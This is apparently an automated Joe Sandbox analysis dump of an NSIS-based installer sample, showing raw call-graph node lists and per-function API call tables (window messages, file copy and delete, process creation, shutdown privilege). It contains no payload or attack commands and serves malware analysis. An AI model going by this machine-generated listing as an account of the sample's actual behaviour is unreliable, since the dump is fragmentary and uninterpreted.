4888 404d4a SendMessageW 4879->4888 4880->4879 4892 40487a 5 API calls 4880->4892 4905 404c86 4880->4905 4887 403d6b 19 API calls 4881->4887 4885 404db5 4882->4885 4886 404da9 SendMessageW 4882->4886 4889 403df6 8 API calls 4883->4889 4890 404ac6 SendMessageW SendMessageW 4884->4890 4897 404dc7 ImageList_Destroy 4885->4897 4898 404dce 4885->4898 4903 404dde 4885->4903 4886->4885 4893 404af8 4887->4893 4888->4883 4895 404d5f SendMessageW 4888->4895 4896 404f97 4889->4896 4890->4878 4891 404ced SendMessageW 4891->4879 4892->4905 4899 403d6b 19 API calls 4893->4899 4894 404f48 4894->4883 4904 404f5d ShowWindow GetDlgItem ShowWindow 4894->4904 4900 404d72 4895->4900 4897->4898 4901 404dd7 GlobalFree 4898->4901 4898->4903 4907 404b09 4899->4907 4909 404d83 SendMessageW 4900->4909 4901->4903 4902 404bd6 GetWindowLongW SetWindowLongW 4906 404bf0 4902->4906 4903->4894 4908 40141d 80 API calls 4903->4908 4918 404e10 4903->4918 4904->4883 4905->4879 4905->4891 4910 404bf6 ShowWindow 4906->4910 4911 404c0e 4906->4911 4907->4902 4913 404b65 SendMessageW 4907->4913 4914 404bd0 4907->4914 4916 404b93 SendMessageW 4907->4916 4917 404ba7 SendMessageW 4907->4917 4908->4918 4909->4882 4925 403dc4 SendMessageW 4910->4925 4926 403dc4 SendMessageW 4911->4926 4913->4907 4914->4902 4914->4906 4916->4907 4917->4907 4919 404e54 4918->4919 4922 404e3e SendMessageW 4918->4922 4920 404f1f InvalidateRect 4919->4920 4924 404ecd SendMessageW SendMessageW 4919->4924 4920->4894 4921 404f35 4920->4921 4923 4043d9 21 API calls 4921->4923 4922->4919 4923->4894 4924->4919 4925->4883 4926->4880 4927 4030a9 SendMessageW 4928 4030c2 InvalidateRect 4927->4928 4929 4030e3 4927->4929 4928->4929 3880 4038af #17 SetErrorMode OleInitialize 3881 406328 3 API calls 3880->3881 3882 4038f2 SHGetFileInfoW 3881->3882 3954 406035 lstrcpynW 3882->3954 3884 40391d GetCommandLineW 3955 406035 lstrcpynW 3884->3955 3886 40392f GetModuleHandleW 3887 403947 3886->3887 3888 405d32 CharNextW 3887->3888 3889 403956 CharNextW 3888->3889 3900 403968 3889->3900 3890 403a02 3891 403a21 GetTempPathW 3890->3891 3956 4037f8 3891->3956 3893 403a37 3895 403a3b GetWindowsDirectoryW lstrcatW 3893->3895 3896 403a5f DeleteFileW 3893->3896 3894 405d32 CharNextW 3894->3900 3898 4037f8 11 API calls 3895->3898 3964 4035b3 GetTickCount GetModuleFileNameW 3896->3964 3901 403a57 3898->3901 3899 403a73 3902 403af8 3899->3902 3904 405d32 CharNextW 3899->3904 3940 403add 3899->3940 3900->3890 3900->3894 3907 403a04 3900->3907 3901->3896 3901->3902 4049 403885 3902->4049 3908 403a8a 3904->3908 4056 406035 lstrcpynW 3907->4056 3919 403b23 lstrcatW lstrcmpiW 3908->3919 3920 403ab5 3908->3920 3909 403aed 3912 406113 9 API calls 3909->3912 3910 403bfa 3913 403c7d 3910->3913 3915 406328 3 API calls 3910->3915 3911 403b0d 3914 405ccc MessageBoxIndirectW 3911->3914 3912->3902 3916 403b1b ExitProcess 3914->3916 3918 403c09 3915->3918 3922 406328 3 API calls 3918->3922 3919->3902 3921 403b3f CreateDirectoryW SetCurrentDirectoryW 3919->3921 4057 4067aa 3920->4057 3924 403b62 3921->3924 3925 403b57 3921->3925 3926 403c12 3922->3926 4074 406035 lstrcpynW 3924->4074 4073 406035 lstrcpynW 3925->4073 3930 406328 3 API calls 3926->3930 3933 403c1b 3930->3933 3932 403b70 4075 406035 lstrcpynW 3932->4075 3934 403c69 ExitWindowsEx 3933->3934 3939 403c29 GetCurrentProcess 3933->3939 3934->3913 3938 403c76 3934->3938 3935 403ad2 4072 406035 lstrcpynW 3935->4072 3941 40141d 80 API calls 3938->3941 3943 403c39 3939->3943 3992 405958 3940->3992 3941->3913 3942 406831 18 API calls 3944 403b98 DeleteFileW 3942->3944 3943->3934 3945 403ba5 CopyFileW 3944->3945 3951 403b7f 3944->3951 3945->3951 3946 403bee 3947 406c94 42 API calls 3946->3947 3949 403bf5 3947->3949 3948 406c94 42 API calls 3948->3951 3949->3902 3950 406831 18 API calls 3950->3951 3951->3942 3951->3946 3951->3948 3951->3950 3953 403bd9 CloseHandle 3951->3953 4076 405c6b CreateProcessW 3951->4076 3953->3951 3954->3884 3955->3886 3957 406064 5 API calls 3956->3957 3958 403804 3957->3958 3959 40380e 3958->3959 3960 40674e 3 API calls 3958->3960 3959->3893 3961 403816 CreateDirectoryW 3960->3961 3962 405eab 2 API calls 3961->3962 3963 40382a 3962->3963 3963->3893 4079 405e7c GetFileAttributesW CreateFileW 3964->4079 3966 4035f3 3986 403603 3966->3986 4080 406035 lstrcpynW 3966->4080 3968 403619 4081 40677d lstrlenW 3968->4081 3972 40362a GetFileSize 3973 403726 3972->3973 3987 403641 3972->3987 4086 4032d2 3973->4086 3975 40372f 3977 40376b GlobalAlloc 3975->3977 3975->3986 4098 403368 SetFilePointer 3975->4098 3976 403336 ReadFile 3976->3987 4097 403368 SetFilePointer 3977->4097 3980 4037e9 3983 4032d2 6 API calls 3980->3983 3981 403786 3984 40337f 33 API calls 3981->3984 3982 40374c 3985 403336 ReadFile 3982->3985 3983->3986 3990 403792 3984->3990 3989 403757 3985->3989 3986->3899 3987->3973 3987->3976 3987->3980 3987->3986 3988 4032d2 6 API calls 3987->3988 3988->3987 3989->3977 3989->3986 3990->3986 3990->3990 3991 4037c0 SetFilePointer 3990->3991 3991->3986 3993 406328 3 API calls 3992->3993 3994 40596c 3993->3994 3995 405972 3994->3995 3996 405984 3994->3996 4112 405f7d wsprintfW 3995->4112 3997 405eff 3 API calls 3996->3997 3998 4059b5 3997->3998 4000 4059d4 lstrcatW 3998->4000 4002 405eff 3 API calls 3998->4002 4001 405982 4000->4001 4103 403ec1 4001->4103 4002->4000 4005 4067aa 18 API calls 4006 405a06 4005->4006 4007 405a9c 4006->4007 4009 405eff 3 API calls 4006->4009 4008 4067aa 18 API calls 4007->4008 4010 405aa2 4008->4010 4011 405a38 4009->4011 4012 405ab2 4010->4012 4013 406831 18 API calls 4010->4013 4011->4007 4015 405a5b lstrlenW 4011->4015 4018 405d32 CharNextW 4011->4018 4014 405ad2 LoadImageW 4012->4014 4114 403ea0 4012->4114 4013->4012 4016 405b92 4014->4016 4017 405afd RegisterClassW 4014->4017 4019 405a69 lstrcmpiW 4015->4019 4020 405a8f 4015->4020 4024 40141d 80 API calls 4016->4024 4022 405b9c 4017->4022 4023 405b45 SystemParametersInfoW CreateWindowExW 4017->4023 4025 405a56 4018->4025 4019->4020 4026 405a79 GetFileAttributesW 4019->4026 4028 40674e 3 API calls 4020->4028 4022->3909 4023->4016 4029 405b98 4024->4029 4025->4015 4030 405a85 4026->4030 4027 405ac8 4027->4014 4031 405a95 4028->4031 4029->4022 4032 403ec1 19 API calls 4029->4032 4030->4020 4033 40677d 2 API calls 4030->4033 4113 406035 lstrcpynW 4031->4113 4035 405ba9 4032->4035 4033->4020 4036 405bb5 ShowWindow LoadLibraryW 4035->4036 4037 405c38 4035->4037 4038 405bd4 LoadLibraryW 4036->4038 4039 405bdb GetClassInfoW 4036->4039 4040 405073 83 API calls 4037->4040 4038->4039 4041 405c05 DialogBoxParamW 4039->4041 4042 405bef GetClassInfoW RegisterClassW 4039->4042 4043 405c3e 4040->4043 4046 40141d 80 API calls 4041->4046 4042->4041 4044 405c42 4043->4044 4045 405c5a 4043->4045 4044->4022 4048 40141d 80 API calls 4044->4048 4047 40141d 80 API calls 4045->4047 4046->4022 4047->4022 4048->4022 4050 40389d 4049->4050 4051 40388f CloseHandle 4049->4051 4121 403caf 4050->4121 4051->4050 4056->3891 4174 406035 lstrcpynW 4057->4174 4059 4067bb 4060 405d85 4 API calls 4059->4060 4061 4067c1 4060->4061 4062 406064 5 API calls 4061->4062 4069 403ac3 4061->4069 4065 4067d1 4062->4065 4063 406809 lstrlenW 4064 406810 4063->4064 4063->4065 4067 40674e 3 API calls 4064->4067 4065->4063 4066 406301 2 API calls 4065->4066 4065->4069 4070 40677d 2 API calls 4065->4070 4066->4065 4068 406816 GetFileAttributesW 4067->4068 4068->4069 4069->3902 4071 406035 lstrcpynW 4069->4071 4070->4063 4071->3935 4072->3940 4073->3924 4074->3932 4075->3951 4077 405ca6 4076->4077 4078 405c9a CloseHandle 4076->4078 4077->3951 4078->4077 4079->3966 4080->3968 4082 40678c 4081->4082 4083 406792 CharPrevW 4082->4083 4084 40361f 4082->4084 4083->4082 4083->4084 4085 406035 lstrcpynW 4084->4085 4085->3972 4087 4032f3 4086->4087 4088 4032db 4086->4088 4091 403303 GetTickCount 4087->4091 4092 4032fb 4087->4092 4089 4032e4 DestroyWindow 4088->4089 4090 4032eb 4088->4090 4089->4090 4090->3975 4094 403311 CreateDialogParamW ShowWindow 4091->4094 4095 403334 4091->4095 4099 40635e 4092->4099 4094->4095 4095->3975 4097->3981 4098->3982 4100 40637b PeekMessageW 4099->4100 4101 406371 DispatchMessageW 4100->4101 4102 403301 4100->4102 4101->4100 4102->3975 4104 403ed5 4103->4104 4119 405f7d wsprintfW 4104->4119 4106 403f49 4107 406831 18 API calls 4106->4107 4108 403f55 SetWindowTextW 4107->4108 4109 403f70 4108->4109 4110 403f8b 4109->4110 4111 406831 18 API calls 4109->4111 4110->4005 4111->4109 4112->4001 4113->4007 4120 406035 lstrcpynW 4114->4120 4116 403eb4 4117 40674e 3 API calls 4116->4117 4118 403eba lstrcatW 4117->4118 4118->4027 4119->4106 4120->4116 4122 403cbd 4121->4122 4123 4038a2 4122->4123 4124 403cc2 FreeLibrary GlobalFree 4122->4124 4125 406cc7 4123->4125 4124->4123 4124->4124 4126 4067aa 18 API calls 4125->4126 4127 406cda 4126->4127 4128 406ce3 DeleteFileW 4127->4128 4129 406cfa 4127->4129 4168 4038ae CoUninitialize 4128->4168 4130 406e77 4129->4130 4172 406035 lstrcpynW 4129->4172 4136 406301 2 API calls 4130->4136 4156 406e84 4130->4156 4130->4168 4132 406d25 4133 406d39 4132->4133 4134 406d2f lstrcatW 4132->4134 4137 40677d 2 API calls 4133->4137 4135 406d3f 4134->4135 4139 406d4f lstrcatW 4135->4139 4141 406d57 lstrlenW FindFirstFileW 4135->4141 4138 406e90 4136->4138 4137->4135 4142 40674e 3 API calls 4138->4142 4138->4168 4139->4141 4140 4062cf 11 API calls 4140->4168 4145 406e67 4141->4145 4169 406d7e 4141->4169 4143 406e9a 4142->4143 4146 4062cf 11 API calls 4143->4146 4144 405d32 CharNextW 4144->4169 4145->4130 4147 406ea5 4146->4147 4148 405e5c 2 API calls 4147->4148 4149 406ead RemoveDirectoryW 4148->4149 4153 406ef0 4149->4153 4154 406eb9 4149->4154 4150 406e44 FindNextFileW 4152 406e5c FindClose 4150->4152 4150->4169 4152->4145 4155 404f9e 25 API calls 4153->4155 4154->4156 4157 406ebf 4154->4157 4155->4168 4156->4140 4159 4062cf 11 API calls 4157->4159 4158 4062cf 11 API calls 4158->4169 4160 406ec9 4159->4160 4163 404f9e 25 API calls 4160->4163 4161 406cc7 72 API calls 4161->4169 4162 405e5c 2 API calls 4164 406dfa DeleteFileW 4162->4164 4165 406ed3 4163->4165 4164->4169 4166 406c94 42 API calls 4165->4166 4166->4168 4167 404f9e 25 API calls 4167->4150 4168->3910 4168->3911 4169->4144 4169->4150 4169->4158 4169->4161 4169->4162 4169->4167 4170 404f9e 25 API calls 4169->4170 4171 406c94 42 API calls 4169->4171 4173 406035 lstrcpynW 4169->4173 4170->4169 4171->4169 4172->4132 4173->4169 4174->4059 4930 401cb2 4931 40145c 18 API calls 4930->4931 4932 401c54 4931->4932 4933 4062cf 11 API calls 4932->4933 4934 401c64 4932->4934 4935 401c59 4933->4935 4936 406cc7 81 API calls 4935->4936 4936->4934 3706 4021b5 3707 40145c 18 API calls 3706->3707 3708 4021bb 3707->3708 3709 40145c 18 API calls 3708->3709 3710 4021c4 3709->3710 3711 40145c 18 API calls 3710->3711 3712 4021cd 3711->3712 3713 40145c 18 API calls 3712->3713 3714 4021d6 3713->3714 3715 404f9e 25 API calls 3714->3715 3716 4021e2 ShellExecuteW 3715->3716 3717 40221b 3716->3717 3718 40220d 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 4062cf 11 API calls 3718->3720 3721 402230 3719->3721 3720->3717 4937 402238 4938 40145c 18 API calls 4937->4938 4939 40223e 4938->4939 4940 4062cf 11 API calls 4939->4940 4941 40224b 4940->4941 4942 404f9e 25 API calls 4941->4942 4943 402255 4942->4943 4944 405c6b 2 API calls 4943->4944 4945 40225b 4944->4945 4946 4062cf 11 API calls 4945->4946 4954 4022ac CloseHandle 4945->4954 4951 40226d 4946->4951 4948 4030e3 4949 402283 WaitForSingleObject 4950 402291 GetExitCodeProcess 4949->4950 4949->4951 4953 4022a3 4950->4953 4950->4954 4951->4949 4952 40635e 2 API calls 4951->4952 4951->4954 4952->4949 4956 405f7d wsprintfW 4953->4956 4954->4948 4956->4954 4957 404039 4958 404096 4957->4958 4959 404046 lstrcpynA lstrlenA 4957->4959 4959->4958 4960 404077 4959->4960 4960->4958 4961 404083 GlobalFree 4960->4961 4961->4958 4962 401eb9 4963 401f24 4962->4963 4966 401ec6 4962->4966 4964 401f53 GlobalAlloc 4963->4964 4968 401f28 4963->4968 4970 406831 18 API calls 4964->4970 4965 401ed5 4969 4062cf 11 API calls 4965->4969 4966->4965 4972 401ef7 4966->4972 4967 401f36 4986 406035 lstrcpynW 4967->4986 4968->4967 4971 4062cf 11 API calls 4968->4971 4981 401ee2 4969->4981 4974 401f46 4970->4974 4971->4967 4984 406035 lstrcpynW 4972->4984 4976 402708 4974->4976 4977 402387 GlobalFree 4974->4977 4977->4976 4978 401f06 4985 406035 lstrcpynW 4978->4985 4979 406831 18 API calls 4979->4981 4981->4976 4981->4979 4982 401f15 4987 406035 lstrcpynW 4982->4987 4984->4978 4985->4982 4986->4974 4987->4976

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                                                                                                            APIs
                                                                                                                                            • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                                                            • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                                                            • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                                                            • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                                                              • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                              • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426979,74DF23A0,00000000), ref: 00406902
                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                                                            • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                            • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                            • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                            • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                            • EmptyClipboard.USER32 ref: 0040543D
                                                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                            • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                            • String ID: New install of "%s" to "%s"${
                                                                                                                                            • API String ID: 2110491804-1641061399
                                                                                                                                            • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                            • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                                                            • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                            • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                                                                                            APIs
                                                                                                                                            • #17.COMCTL32 ref: 004038CE
                                                                                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                              • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                              • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                              • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                            • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                            • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                            • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                            • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                            • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                            • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                            • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                            • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                            • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                            • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                            • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                            • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                            • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                            • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                            • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                            • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                            • API String ID: 2435955865-3712954417
                                                                                                                                            • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                            • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                            • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                            • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 790 406301-406315 FindFirstFileW 791 406322 790->791 792 406317-406320 FindClose 790->792 793 406324-406325 791->793 792->793
                                                                                                                                            APIs
                                                                                                                                            • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
